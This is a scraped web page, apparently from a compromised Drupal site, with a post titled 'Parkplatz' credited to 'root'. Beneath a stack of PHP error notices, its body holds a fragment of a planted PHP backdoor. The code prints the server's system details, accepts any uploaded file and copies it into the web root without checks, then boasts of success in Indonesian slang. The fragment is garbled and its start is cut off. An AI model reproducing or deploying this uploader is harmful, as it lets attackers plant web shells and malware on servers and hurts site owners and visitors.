Error message

  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in _menu_load_objects() (line 569 of /www/htdocs/w0113161/version1.0/includes/menu.inc).
  • Deprecated function: implode(): Passing glue string after array is deprecated. Swap the parameters in drupal_get_feeds() (line 394 of /www/htdocs/w0113161/version1.0/includes/common.inc).

Hsuwuw

Parkplatz

root's picture
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses COk..!!!!! -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>